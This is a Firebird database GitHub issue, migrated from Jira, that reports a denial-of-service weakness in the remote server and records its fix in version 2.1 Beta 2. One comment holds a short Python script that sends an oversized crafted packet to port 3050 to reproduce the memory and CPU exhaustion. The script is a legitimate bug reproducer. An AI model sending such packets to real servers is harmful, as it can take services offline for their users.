Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Possible vulnerability in remote server [CORE1397] #1815

Closed
firebird-automations opened this issue Aug 2, 2007 · 6 comments
Closed

Possible vulnerability in remote server [CORE1397] #1815

firebird-automations opened this issue Aug 2, 2007 · 6 comments

Comments

@firebird-automations
Copy link
Collaborator

Submitted by: @hvlad

Large network packets with garbage may result in big memory consumption and hign CPU load

Commits: 1b06f78 61f40e3

@firebird-automations
Copy link
Collaborator Author

Commented by: @hvlad

Pyton script below reproduced the issue :

import struct
import socket

IP = "127.0.0.1"
port = 3050

largo1 = 2372
pack1_2 = "A" * largo1

largo2 = 0x20000
pack2 = "Z" * largo2

op = "\x00\x00\x00\x14"
unknown = "\x00\x00\x00\x03"

packet2 = op
packet2+= unknown
packet2 += struct.pack(">L", largo1)
packet2 += pack1_2
packet2 += struct.pack(">L", largo2)
packet2 += pack2

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((IP, port))
s.send(packet2)

@firebird-automations
Copy link
Collaborator Author

Modified by: @hvlad

status: Open [ 1 ] => Resolved [ 5 ]

resolution: Fixed [ 1 ]

Fix Version: 2.1 Beta 2 [ 10190 ]

@firebird-automations
Copy link
Collaborator Author

Modified by: @hvlad

security: Developers [ 10012 ] =>

@firebird-automations
Copy link
Collaborator Author

Modified by: @pcisar

status: Resolved [ 5 ] => Closed [ 6 ]

@firebird-automations
Copy link
Collaborator Author

Modified by: @pcisar

Workflow: jira [ 12743 ] => Firebird [ 14438 ]

@firebird-automations
Copy link
Collaborator Author

Modified by: @pavel-zotov

QA Status: No test

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment